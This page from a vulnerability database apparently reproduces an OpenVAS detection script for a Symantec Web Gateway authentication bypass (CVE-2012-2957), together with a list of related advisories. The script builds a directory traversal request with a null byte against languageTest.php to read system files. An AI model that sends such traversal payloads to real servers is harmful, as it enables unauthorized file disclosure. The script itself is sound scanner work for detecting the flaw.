Lucene search
+L

Symantec Web Gateway Local File Manipulation Authentication Bypass Vulnerability

🗓️ 24 Jul 2012 00:00:00Reported by Copyright (C) 2012 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 22 Views

Symantec Web Gateway Local File Manipulation Vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2012-2957
24 Jul 201200:00
circl
checkpoint_advisories
Check Point Advisories
Symantec Web Gateway Local File Inclusion (CVE-2012-2957)
29 Sep 202100:00
checkpoint_advisories
cve
CVE
CVE-2012-2957
23 Jul 201217:00
cve
cvelist
Cvelist
CVE-2012-2957
23 Jul 201217:00
cvelist
dsquare
Dsquare
Symantec Web Gateway 5.0.3 RCE
8 Feb 201300:00
dsquare
exploitdb
Exploit DB
Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion / Remote Command Execution
24 Jul 201200:00
exploitdb
euvd
EUVD
EUVD-2012-2935
7 Oct 202500:30
euvd
nvd
NVD
CVE-2012-2957
23 Jul 201217:55
nvd
openvas
OpenVAS
Symantec Web Gateway Multiple Vulnerabilities
24 Jul 201200:00
openvas
packetstorm
Packet Storm
Symantec Web Gateway 5.0.3.18 LFI / Command Execution
24 Jul 201200:00
packetstorm
Rows per page
SourceLink
securityfocuswww.securityfocus.com/bid/54429
# SPDX-FileCopyrightText: 2012 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:symantec:web_gateway";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.103523");
  script_cve_id("CVE-2012-2957");
  script_tag(name:"cvss_base", value:"7.2");
  script_tag(name:"cvss_base_vector", value:"AV:L/AC:L/Au:N/C:C/I:C/A:C");
  script_version("2025-04-15T05:54:49+0000");
  script_name("Symantec Web Gateway Local File Manipulation Authentication Bypass Vulnerability");
  script_tag(name:"last_modification", value:"2025-04-15 05:54:49 +0000 (Tue, 15 Apr 2025)");
  script_tag(name:"creation_date", value:"2012-07-24 10:16:58 +0200 (Tue, 24 Jul 2012)");
  script_category(ACT_ATTACK);
  script_family("Web application abuses");
  script_copyright("Copyright (C) 2012 Greenbone AG");
  script_dependencies("gb_symantec_web_gateway_detect.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("symantec_web_gateway/installed");

  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/54429");

  script_tag(name:"solution", value:"Vendor updates are available. Please see the references for more
  information.");

  script_tag(name:"summary", value:"Symantec Web Gateway is prone to a local authentication-bypass
  vulnerability");

  script_tag(name:"impact", value:"A attacker can exploit this issue by manipulating certain local files to bypass
  authentication and gain unauthorized privileged access to the application. Successful exploits may lead to other attacks.");

  script_tag(name:"affected", value:"Symantec Web Gateway versions 5.0.x.x are vulnerable.");

  script_tag(name:"qod_type", value:"remote_vul");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");
include("os_func.inc");
include("misc_func.inc");
include("traversal_func.inc");

if( ! port = get_app_port( cpe:CPE ) )
  exit( 0 );

if( ! dir = get_app_location( cpe:CPE, port:port ) )
  exit( 0 );

if( dir == "/" )
  dir = "";

files = traversal_files( "Linux" );

foreach pattern( keys( files ) ) {

  file = files[pattern];
  url = dir + '/spywall/languageTest.php?&language=' + crap( data:"../", length:6*9 ) + file + '%00';

  if( http_vuln_check( port:port, url:url, pattern:pattern ) ) {
    report = http_report_vuln_url( port:port, url:url );
    security_message( port:port, data:report );
    exit( 0 );
  }
}

exit( 0 );

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Apr 2025 00:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 27.2
EPSS0.59287
22